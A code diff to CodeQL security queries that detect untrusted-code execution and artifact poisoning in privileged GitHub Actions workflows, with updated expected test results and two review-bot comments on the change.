a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql 
@@ -18,16 +18,18 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check +from + LocalJob job, MutableRefCheckoutStep checkout, PoisonableStep step, ControlCheck check, + Event event where - j.getAStep() = checkout and + job.getAStep() = checkout and // the checked-out code may lead to arbitrary code execution - checkout.getAFollowingStep() = s and + checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and + inPrivilegedContext(checkout, event) and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and - not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") -select s, checkout, s, + check.protects(checkout, event, "untrusted-checkout") and + not check.protects(checkout, event, "untrusted-checkout-toctou") +select step, checkout, step, "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 7f584e00c9a..5956b52ccbe 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
@@ -16,16 +16,17 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob j, MutableRefCheckoutStep checkout, ControlCheck check +from LocalJob job, MutableRefCheckoutStep checkout, ControlCheck check, Event event where - j.getAStep() = checkout and + job.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and + inPrivilegedContext(checkout, event) and + event = job.getATriggerEvent() and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and - not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") + check.protects(checkout, event, "untrusted-checkout") and + not check.protects(checkout, event, "untrusted-checkout-toctou") select checkout, "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index 82c6f936c51..e4ab90e5fc2 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql 
@@ -16,10 +16,13 @@ import codeql.actions.security.ArtifactPoisoningQuery import ArtifactPoisoningFlow::PathGraph import codeql.actions.security.ControlChecks -from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink, Event event where ArtifactPoisoningFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, "artifact-poisoning") + ) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql index a50c47a9793..5f676052ef6 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql @@ -16,8 +16,9 @@ import actions import codeql.actions.security.PoisonableSteps import codeql.actions.security.UseOfKnownVulnerableActionQuery -from UsesStep download, KnownVulnerableAction vulnerable_action +from UsesStep download, KnownVulnerableAction vulnerable_action, Event event where + event = download.getEnclosingJob().getATriggerEvent() and vulnerable_action.getVulnerableAction() = download.getCallee() and download.getCallee() = "actions/download-artifact" and ( 
@@ -28,7 +29,7 @@ where // exists a poisonable upload artifact in the same workflow exists(UsesStep checkout, PoisonableStep poison, UsesStep upload | download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and - download.getEnclosingJob().isPrivilegedExternallyTriggerable() and + download.getEnclosingJob().isPrivilegedExternallyTriggerable(event) and checkout.getCallee() = "actions/checkout" and checkout.getAFollowingStep() = poison and poison.getAFollowingStep() = upload and diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 31a4cdf94e5..f9f95191795 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -25,8 +25,7 @@ where // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and - event = checkout.getEnclosingJob().getATriggerEvent() and + inPrivilegedContext(step, event) and ( // issue_comment: check for date comparison checks and actor/access control checks event.getName() = "issue_comment" and @@ -36,12 +35,13 @@ where check instanceof AssociationCheck or check instanceof PermissionCheck ) and - check.dominates(checkout) and - date_check.dominates(checkout) + check.dominates(step) and + date_check.dominates(step) ) or // not issue_comment triggered workflows not event.getName() = "issue_comment" and - not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) + not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) ) -select step, checkout, step, "Execution of untrusted code on a privileged workflow." +select step, checkout, step, "Execution of untrusted code on a privileged workflow. $@", event, + event.getLocation().getFile().toString() 
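Review bot: The comment `// the checkout occurs in a privileged context` in UntrustedCheckoutCritical.ql is now stale, because the line under it became `inPrivilegedContext(step, event)` and tests the poisonable step rather than the checkout. Suggest `// the poisonable step runs in a privileged context for this trigger event`. The `where` clause starts above this hunk and continues into the next one, where `check.dominates` and `check.protects` are switched from `checkout` to `step` in the same way, so a control check placed between the checkout and the poisonable step now counts as protection; that shift is worth one sentence in the query's documentation.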
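Review bot: Adding `event` to the `select` makes the query return one row per trigger event, so the same step/checkout pair is reported several times for a workflow with multiple triggers; the updated UntrustedCheckoutCritical.expected lists each `level0.yml` step three times (`issues`, `issue_comment`, `pull_request_target`). The link text is `event.getLocation().getFile().toString()`, which repeats the workflow path and is identical across those rows, while the `$@` link already carries the event's location. Using the trigger name would make the rows distinguishable: `"Execution of untrusted code on a privileged workflow. $@", event, event.getName()`.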
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index bc6f0e36e56..e130ba5dbb8 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -23,8 +23,7 @@ where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and - event = checkout.getEnclosingJob().getATriggerEvent() and + inPrivilegedContext(checkout, event) and ( // issue_comment: check for date comparison checks and actor/access control checks event.getName() = "issue_comment" and diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 8cc8e75c2af..66c68e882e2 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -15,8 +15,6 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery -import codeql.actions.security.PoisonableSteps -import codeql.actions.security.ControlChecks from PRHeadCheckoutStep checkout where diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 609b09fdfef..3ad4e6915d2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -438,7 +438,6 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index afae2454078..006f365ae05 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -246,37 +246,42 @@ edges | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. 
| -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. 
| -| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. 
| -| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. 
| -| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | +| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | 